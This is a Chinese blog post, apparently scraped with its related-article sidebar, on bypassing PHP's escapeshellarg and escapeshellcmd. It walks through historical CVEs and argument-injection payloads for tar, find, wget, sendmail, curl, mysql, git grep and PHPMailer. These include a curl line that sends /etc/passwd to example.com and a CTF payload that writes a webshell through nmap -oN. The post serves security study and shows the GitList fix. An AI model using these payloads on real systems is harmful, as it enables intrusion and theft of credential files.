php中{$msg|escape},PHP-escapeshell-命令执行

最新推荐文章于 2021-10-25 11:35:37 发布
最新推荐文章于 2021-10-25 11:35:37 发布
阅读量236 收藏
点赞数
文章标签: php中{$msg|escape}

25519070b731fea00eed0b06f32d923c.png

最近审计 PHP 时,频繁出现的escapeshellarg与escapeshellcmd成功勾起了我的

性致

兴趣,深入了解后发现确实漏洞百出

Know it then do it

escapeshellarg

string escapeshellarg ( string $arg )

转义字符串 $arg 中的单引号并使用单引号包裹此部分

使得 $arg 只能传递一个参数,且不能执行不同的命令

escapeshellcmd

string escapeshellcmd ( string $command )

转义 & # ; ` | * ? ~ < > ^ ( ) [ ] { } $ 、 x0A 和 xF , ' 和 " 仅在落单时被转义

使得 $command 只能执行一个命令,但可以传递多个参数

举个栗子

172.17.0.2' -v -d a=1

'172.17.0.2''' -v -d a=1'

'172.17.0.2'\'' -v -d a=1'

172.17.0.2 -v -d a=1'

历史漏洞

Windows下PHP<=4.3.6- CVE-2004-0542

$find = 'word';

system('FIND /C /I '.escapeshellarg($find).' c:\where\');

//or

$find = 'word " c:\where\ || dir || ';

system('FIND /C /I '.escapeshellarg($find).' c:\where\');

PHP4<=4.4.8与 PHP 5<=5.2.5- CVE-2008-2051

//需要有可变宽度字符集的shell环境(例如GBK、EUC-KR、SJIS)

$text = "sth";

system(escapeshellcmd("echo ".$text));

$text = "sth xc0; id";

system(escapeshellcmd("echo ".$text));

//or

$text1 = 'word';

$text2 = 'word2';

system('echo '.escapeshellarg($text1).' '.escapeshellarg($text2));

$text1 = "word xc0";

$text2 = "; id ; #";

system('echo '.escapeshellarg($text1).' '.escapeshellarg($text2));

Windows下PHP5.4.42以下, 5.5.26以下的5.5.x, 5.6.10以下的5.6.x- CVE-2015-4642

//向函数传递额外的`(--param3)`

$a = 'param1_value';

$b = 'param2_value';

system('my_command --param1 ' . escapeshellarg($a) . ' --param2 ' . escapeshellarg($b));

$a = 'a\';

$b = 'b -c --param3\';

system('my_command --param1 ' . escapeshellarg($a) . ' --param2 ' . escapeshellarg($b));

PHP7.0.2以下的7.x- CVE-2016-1904

如果向 escapeshellarg 或 escapeshellarg 传递1024兆个字节,则可能会触发堆溢出

Windows下5.4.43以下的5.4.x, 5.5.27以下的5.5.x, 5.6.11以下的5.6.x- Bugs

//EnableDelayedExpansion`为`enabled`时,`!STH!`的特性类似于`%STH%`,而`escapeshellarg`并未处理`!`

//可以在HKLM或HKCU下的注册表中设置EnableDelayedExpansion

[HKEY_CURRENT_USERSoftwareMicrosoftCommand Processor]

"DelayedExpansion"= (REG_DWORD)

1=enabled 0=disabled (default)

// Leak appdata dir value

$text = '!APPDATA!';

print "echo ".escapeshellarg($text);

PHP5.6.18以下- Bugs

//`ext/standard/exec.c`中

echo escapeshellarg("helloworld");

=>

hello

参数注入

由上文可以看出,当存在 escapeshellarg 或 escapeshellcmd 时均不可能执行第二个命令,但仍能传递多个参数给 escapeshellcmd ,漏洞可造成的危害取决于当前程序所拥有的功能

将 some_file 压缩至 /tmp/sth

$command = '-cf /tmp/sth /some_file';

system(escapeshellcmd('tar '.$command));

创建 /tmp/exploit 空文件

$command = "--use-compress-program='touch /tmp/exploit' -cf /tmp/passwd /etc/passwd";

system(escapeshellcmd('tar '.$command));

在 /tmp 目录下查找 some_file

$file = "some_file";

system("find /tmp -iname ".escapeshellcmd($file));

输出 /etc/passwd 的内容

$file = "sth -or -exec cat /etc/passwd ; -quit";

system("find /tmp -iname ".escapeshellcmd($file));

下载 example.php

$url = 'http://example.com/example.php';

system(escapeshellcmd('wget '.$url));

保存 .php 文件至指定目录

$url = '--directory-prefix=/var/www/html http://example.com/example.php';

system(escapeshellcmd('wget '.$url));

sendmail

将发件人地址设置为 mail.txt

$from = 'from@sth.com';

system("/usr/sbin/sendmail -t -i -f".escapeshellcmd($from ).' < mail.txt');

输出 /etc/passwd 的内容

$from = 'from@sth.com -C/etc/passwd -X/tmp/output.txt';

system("/usr/sbin/sendmail -t -i -f".escapeshellcmd($from ).' < mail.txt');

获取 http://example.com 的内容

$url = 'http://example.com';

system(escapeshellcmd('curl '.$url));

将 /etc/passwd 发送到 http://example.com

$url = '-F password=@/etc/passwd http://example.com';

system(escapeshellcmd('curl '.$url));

file_put_contents('passwords.txt', file_get_contents($_FILES['password']['tmp_name']));

执行SQL语句

$sql = 'SELECT sth FROM table';

system("mysql -uuser -ppassword -e ".escapeshellarg($sql));

执行 id 命令

$sql = '! id';

system("mysql -uuser -ppassword -e ".escapeshellarg($sql));

从 archive.zip 中解压所有 .tmp 文件至 /tmp 目录

$zip_name = 'archive.zip';

system(escapeshellcmd('unzip -j '.$zip_name.' *.txt -d /aa/1'));

从 archive.zip 中解压所有 .tmp 文件至 /var/www/html 目录

$zip_name = '-d /var/www/html archive.zip';

system('unzip -j '.escapeshellarg($zip_name).' *.tmp -d /tmp');

若未设置 LANG 环境变量则跳过非ASCII字符

$filename = 'résumé.pdf';

// string(10) "'rsum.pdf'"

var_dump(escapeshellarg($filename));

setlocale(LC_CTYPE, 'en_US.utf8');

//string(14) "'résumé.pdf'"

var_dump(escapeshellarg($filename));

使用 .bat 执行命令

列出 somedir 中的文件

$dir = "somedir";

file_put_contents('out.bat', escapeshellcmd('dir '.$dir));

system('out.bat');

同时执行 whoami 命令

$dir = "somedir x1a whoami";

file_put_contents('out.bat', escapeshellcmd('dir '.$dir));

system('out.bat');

结合 escapeshellcmd 与 escapeshellarg

此时可以向函数传递第二个参数

列出 /tmp 中的文件并忽略 sth

$arg = "sth";

system(escapeshellcmd("ls --ignore=".escapeshellarg($arg).' /tmp'));

使用长列表模式输出 /tmp 中的文件并忽略 sth

$arg = "sth' -l ";

// ls --ignore='exploit'\'' -l ' /tmp

system(escapeshellcmd("ls --ignore=".escapeshellarg($arg).' /tmp'));

GitList

GitList 0.6的 源代码 中,存在参数注入导致的远程命令执行

public function searchTree($query, $branch)

{

if (empty($query)) {

return null;

}

$query = escapeshellarg($query);

try {

$results = $this->getClient()->run($this, "grep -i --line-number {$query} $branch");

} catch (RuntimeException $e) {

return false;

}

}

上述代码可简化为:

$query = 'sth';

system('git grep -i --line-number '.escapeshellarg($query).' *');

由 git-grep文档 可知, --open-files-in-pager 类似于 find 命令的 -exec

$query = '--open-files-in-pager=id;';

system('git grep -i --line-number '.escapeshellarg($query).' *');

修复方案

p神曾经分析过,漏洞最佳解决方案为将 $query 作为 -e 参数的值,即 git grep -i --line-number -e '--open-files-in-pager=id;' master ,不过gitlist采取了另外一种措施:

//将`-`替换后在`$query`前加上`--`

public function searchTree($query, $branch)

{

if (empty($query)) {

return null;

}

$query = preg_replace('/(--?[A-Za-z0-9-]+)/', '', $query);

$query = escapeshellarg($query);

try {

$results = $this->getClient()->run($this, "grep -i --line-number -- {$query} $branch");

} catch (RuntimeException $e) {

return false;

}

PHPMailer

PHPMailer的 源代码 中,存在参数注入导致的远程命令执行

if (force_extra_parameters) {

extra_cmd = php_escape_shell_cmd(force_extra_parameters);

} else if (extra_cmd) {

extra_cmd = php_escape_shell_cmd(extra_cmd);

}

if (php_mail(to_r, subject_r, message, headers_trimmed, extra_cmd TSRMLS_CC)) {

RETVAL_TRUE;

} else {

RETVAL_FALSE;

}

上述代码可简化为:

$param = "172.17.0.2" -v -d a=1";

$ep = escapeshellarg($param);

$eep = escapeshellcmd($ep);

$cmd = "curl " . $eep;

system($cmd);

当两个函数以 ->escapeshellarg->escapeshellcmd-> 的顺序配合使用时,则会存在参数注入。 a'( -OQueueDirectory=/tmp -X/var/www/html/x.php )@a.com 最终变成了 '-fa'\''( -OQueueDirectory=/tmp -X/var/www/html/test.php )@a.com' ,但若将其顺序调换则不会出现此问题,即 ->escapeshellcmd->escapeshellarg->

Nmap命令执行

一道Web安全测试南京总决赛时的CTF题

include("flag.php");

if(!isset($_GET['host'])){

highlight_file(__FILE__);

}else{

$host =(string)$_GET['host'];

$host=escapeshellarg($host);

$host=escapeshellcmd($host);

$sandbox = md5("box".$_SERVER['REMOTE_ADDR']);

echo "you are in sandbox: ".$sandbox."
";

@mkdir($sandbox);

chdir($sandbox);

echo "

";

echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);

echo "

";

}

?>

因为输入流先进 escapeshellarg 函数,再进 escapeshellcmd 函数,所以存在参数注入。随后可利用nmap的 -oN 参数将Webshell写入沙盒文件夹。

逃逸单引号

Payload: ?host=' <?php phpinfo();?> -oN shell.php '

参考资料

XJZZHANG007
关注
PHP毕业设计——艺术品展示网站
大数据精读周刊
12-01 3186
这是我当时我在某课上购买的课程——PHP艺术品展示网站,然后跟着后面边学边做得项目案例, 本科同学可以用来用做毕业设计。 相关得源代码包括数据库文件我已经放到文末尾得GitHub链接已经给出了。 文章目录首页详情页管理员页面发布作品项目结构获取源码 首页 详情页 管理员页面 发布作品 项目结构 C:. │ admin.php │ admin_index.php │ admin_user_list.php │ delete.php │ detail.php │ do_edit.php
风吟PHP Escape 加密/解密.rar
07-16
escape PHP版的加密和解密广泛用于URL或者文数据传输。
php版的escape函数
xuzuning的专栏
11-17 8753
php提供的URL编码函数是基于字节的,对由ie的javascript函数escape编码的数据就无能为力了。因此在此共享本人的php版的escape/unescape函数function escape($str) {  preg_match_all("/[/x80-/xff].|[/x01-/x7f]+/",$str,$r);  $ar = $r[0];  foreach($ar as $k=>
php escape编码函数,php escape URL编码函数
weixin_35101659的博客
04-15 285
php escape URL编码函数发布于 2014-10-06 16:17:12 | 80 次阅读 | 评论: 0 | 来源: 网友投递PHP开源脚本语言PHP(外文名: Hypertext Preprocessor,文名:“超文本预处理器”)是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,入门门槛较低,易于学习,使用广泛,主要适用于Web开发领域。PHP的文件后缀名为ph...
phpescape函数
02-04 3487
在json不支持文,用它传送文数据就会出现数据丢失或者乱码,必须在传送前对要发送的字符串进行编码,由于传送过去需要用js进行数据解析,考虑到js有unescape函数,故若在php有个escape函数,对数据进行编码,在客户端用unescape进行 解码,这样就会方便很多。先在网上搜索一把,很多用php实现的escape函数,大同小异,比如下面一个:function phpEsc
php escapeshellcmd
刘阳龙Herman的专栏
09-14 1751
<br />除去字符串的特殊符号。 <br />语法:string escapeshellcmd(string command);<br />返回值: 字符串 <br />函数种类: 操作系统与环境 <br /> <br /> 内容说明<br />本函数除去了字符串的特殊符号,可以防止使用者耍花招来破解该服务器系统。可以用本函数搭配 exec() 或是 system() 二个函数,酱子可以减少网络上的使用者恶意的破晃募机会。 <br /> <br /> 使用范例<br /><?php<br />sys
【Vue】基础系列(二)模板语法 - 插值语法 - 指令语法 - | v-bind | v-model | v-on | v-if | v- show
YK菌的博客
01-18 5097
模板语法-插值语法-指令语法
PHP实现php-amqplib/php-amqplib实例RabbitMq
owenzhang的博客
10-25 2617
​ 项目代码 https://gitee.com/owenzhang24/tp5 其他笔记: 1: 列出队列(Listing queues) 如果你想查看Rabbitmq队列,并且想知道有多少消息存在其,你(作为特权用户)可以使用rabbitmqctl 工具: rabbitmqctl list_queues。 在Windows,省略sudo: rabbitmqctl.bat l...
PHPRabbitMQ之phpAmqplib实现(五)
yeyun666的博客
02-02 5741
本章讲诉如何使用php-amqplib实现RabbitMQ。 环境:CoentOS,PHP 7 简单介绍一下php-amqplib php-amqplib是Advanced Message Queuing Protocol (AMQP)的一个PHP开源实现。高级消息队列协议(AMQP)是一个异步消息传递所使用的应用层协议规范。作为线路层协议,而不是API(例如JMS),AMQP 客户端能够无...
5G NR 随机接入RACH流程(4)-- Msg1发送时RA-RNTI的计算及功率控制
热门推荐
GiveMe5G的博客
11-24 1万+
前面两篇文章介绍了Msg1的两个重要问题,如何产生PRACH preamble和如何选择合适的时频资源发送preamble。那么本节就是万事俱备,只欠东风了,看看真到了Msg1发送的时候,东风是什么? 问题1:发送无线信号给对方,那么就需要能量。以多大的功率发送Msg1的Preamble合适呢? 问题2:对于随机接入过程,由于此时的PRACH和后面Msg2的PDSCH均不是UE specific...
解析phpescape函数
01-21
采用js对URL的汉字进行escape编码。 <a>这样点击链接后的效时: 引用:http://127.0.0.1/shop/product_list.php?p_sort=PHP%u5F00%u53D1%u8D44%u6E90%u7F51生成了这样的效果, 很明显用PHP的urldecode()或者base64_decode()是无法反解的。 解决方法, 用PHP写一个反解函数: 复制代码 代码如下:function js_unescape(
php进行 escape,php escape unescape
weixin_31297157的博客
03-23 428
js有esacpe和unescape通过两个函数来对汉字等进行加密解密,但是php没有与js对应的加密解密,只能通过该函数进行编码的转换,下面将js加密后的加密解密php版本列出。function unescape($str){$ret = '';$len = strlen($str);for ($i = 0; $i < $len; $i++){if ($str[$i] == '%' &a...
PHP - 函数绕过 - escapeshell[arg|cmd]()
3569
11-30 2981
https://www.anquanke.com/post/id/107336 发现有时候,只有用到相关东西(有需求),才会发现,哎呀,写的真好。 escapeshellarg 1.确保用户只传递一个参数给命令 2.用户不能指定更多的参数一个 3.用户不能执行不同的命令 escapeshellcmd 1.确保用户只执行一个命令 2.用户可以指定不限数量的参数 3.用户不能执行不同的...
php escapeshellcmd,利用/绕过 PHP escapeshellarg/escapeshellcmd函数
weixin_42138703的博客
03-11 2546
escapeshellarg和escapeshellcmd的功能escapeshellarg1.确保用户只传递一个参数给命令2.用户不能指定更多的参数一个3.用户不能执行不同的命令escapeshellcmd1.确保用户只执行一个命令2.用户可以指定不限数量的参数3.用户不能执行不同的命令让我们用groups去打印组里每个username成员$username = 'myuser';system(...
php 双字节编码漏洞,php escapeshellcmd多字节编码漏洞解析及延伸
weixin_39761491的博客
03-21 210
作者:T_Torchidy (jnchaha_at_163.com)来源:安全焦点PHP 5 <= 5.2.5PHP 4 <= 4.4.8一些允许如GBK,EUC-KR, SJIS等宽字节字符集的系统都可能受此影响,影响还是非常大的,国内的虚拟主机应该是通杀的,在测试完这个漏洞之后,发现还是十分有意思的,以前也有过 对这种类型安全漏洞的研究,于是就把相关的漏洞解释和一些自己的想法都写出...
php escapeshellcmd,PHP escapeshellarg()+escapeshellcmd() 之殇
weixin_36368404的博客
03-11 374
Author: Hcamael, p0wd3r (知道创宇404安全实验室)Date: 2016-12-280x00 简介前两天爆出了 PHPMailer 小于 5.2.18 版本的 RCE 漏洞,官方在补丁使用了escapeshellarg来防止注入参数,但有趣的是经过测试我们发现该补丁是可以被绕过的,并且攻击面可以延伸到更大而不仅仅是局限于这个应用。0x01 漏洞复现环境搭建Dockerfi...
php实现escape函数
hzbigdog的专栏
06-06 600
function escape($sStr, $sInCharset='GBK', $sOutCharset='UTF-8'){ return str_replace('\U', '%u', strtoupper(trim(json_encode(convert_encoding($sInCharset, $sOutCharset, '车猫(17098150465)')), '"')));
PHP实现Javascript的escape(),unescape()的方法
BSJV
07-31 3342
最完整的phpescape函数function phpescape($str){    preg_match_all("/[/x80-/xff].|[/x01-/x7f]+/",$str,$newstr);    $ar = $newstr[0];    foreach($ar as $k=>$v){        if(ord($ar[$k])>=127){            $tm
copy_common() { msg "\e[32mcopy_common start\e[0m" # copy common files common_files=`ls -p $SRC_ROOT_DIR | grep -v /` for file in $common_files do msg "copy $file..." cp -rf $SRC_ROOT_DIR/$file $PACK_DIR done # link package-file if [ -e $ROOT_DIR/package-file ];then rm -rf $ROOT_DIR/package-file fi ln -s $SRC_ROOT_DIR/$pack_mode/package-file $ROOT_DIR/package-file msg " `ls package-file -l | awk '{printf $9" "$10" "$11 "\n"}'`" if [ "$pack_mode" == "full" ];then rm $ROOTFS_DIR/linuxroot.img ln -s $ROOTFS_DIR/linuxroot.img $PACK_DIR/linuxroot.img fi msg "\e[32mcopy_common finish\e[0m" }
最新发布
07-20
请注意,这段代码使用了 `msg` 函数来打印不同颜色的消息,但我无法确定 `msg` 函数的实现细节,因此无法提供关于它的详细信息。 希望以上解释能够帮助您理解这段代码。如果还有其他问题,请随时提出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值